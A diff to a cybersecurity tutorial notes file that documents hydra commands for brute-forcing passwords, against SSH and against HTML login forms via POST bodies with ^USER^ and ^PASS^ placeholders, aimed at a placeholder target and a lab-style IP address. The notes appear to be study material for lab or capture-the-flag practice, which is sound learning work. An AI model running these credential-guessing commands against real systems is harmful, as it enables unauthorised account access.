Moremar/IT_tutorials/CyberSecurity/Security/Tools.md

 hydra -l testuser -P rockyou.txt -f -v <TARGET_IP> ssh

 # try all passwords in a word list to access the target IP on a given HTML form
-# no user is needed to access, only a password
+# no user is needed to access, only a password, added to the POST body with the ^PASS^ placeholder
-# we specify the login PHP page, the field to use for the password, and the message on error (separated with ":")
+# we specify the login PHP page, the fields in the POST body, and the message on error (separated with ":")
 hydra -l '' -P pins.txt -f -v 10.10.131.34 http-post-form "/login.php:pin=^PASS^:Access Denied" -s 8000

+# try all passwords from a word list to authenticate as a given user to a HTML form
+# similar to the previous example, but with a user, that is added to the POST body with the ^USER^ placeholder
+hydra -l testuser -P rockyou.txt 10.10.131.34 http-post-form "/login:username=^USER^&password=^PASS^:incorrect"
 ```

 ### Aircrack-ng